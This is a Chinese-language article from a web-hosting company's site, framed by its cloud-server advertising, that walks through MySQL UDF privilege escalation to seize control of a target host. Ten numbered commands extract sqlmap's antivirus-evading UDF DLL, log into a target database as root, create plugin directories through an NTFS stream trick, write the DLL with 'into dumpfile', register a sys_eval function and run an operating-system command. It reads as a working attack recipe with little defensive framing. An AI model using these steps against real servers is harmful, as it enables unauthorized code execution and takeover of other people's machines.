MySQL中UDF提权获取主机控制权的详细步骤-创新互联
本文主要给大家介绍MySQL中UDF提权获取主机控制权的详细步骤,文章内容都是笔者用心摘选和编辑的,具有一定的针对性,对大家的参考意义还是比较大的,下面跟笔者一起了解下MySQL中UDF提权获取主机控制权的详细步骤吧。
创新互联建站专注于企业全网营销推广、网站重做改版、哈密网站定制设计、自适应品牌网站建设、H5网站设计、商城网站制作、集团公司官网建设、外贸网站制作、高端网站制作、响应式网页设计等建站业务,价格优惠性价比高,为哈密等各大城市提供网站开发制作服务。1、python clock.py -d -i lib_mysqludfsys.dll
此步是获取***用的UDF dll。首先要安装sqlmap,然后运行上述命令即可得到解码之后的UDF dll。(sqlmap对其进行编码是为了免杀)
2、mysql -h target_ip -uroot -p
与目标MySQL建立连接
3、select version();
查看MySQL版本
4、select @@basedir;
查看MySQL的安装目录。假设为 c:\program files\mysql\mysql server 5.1
5、select @@plugin_dir;
查看MySQL的插件目录。假设为c:\program files\mysql\mysql server 5.1\plugin
6、select 'it is dll' into dumpfile 'c:\program files\mysql\mysql server 5.1\lib::$INDEX_ALLOCATION';
创建lib目录
7、select 'it is dll' into dumpfile 'c:\program files\mysql\mysql server 5.1\plugin::$INDEX_ALLOCATION';
创建plugin目录
8、select unhex('hex_of_udf.dll') into dumpfile "c:\program files\mysql\mysql server 5.1\plugin\udf.dll";
创建udf.dll,上述命令中hex_of_udf.dll是udf.dll的十六进制文本,可用winhex等编辑软件获得
9、create function sys_eval returns string soname 'udf.dll';
创建函数
10、select sys_eval('whoami');
执行shell命令,表明以获取操作系统的控制权
看完以上关于MySQL中UDF提权获取主机控制权的详细步骤,很多读者朋友肯定多少有一定的了解,如需获取更多的行业知识信息 ,可以持续关注我们的行业资讯栏目的。
另外有需要云服务器可以了解下创新互联scvps.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。
标题名称:MySQL中UDF提权获取主机控制权的详细步骤-创新互联
网站网址:http://azwzsj.com/article/dosjhh.html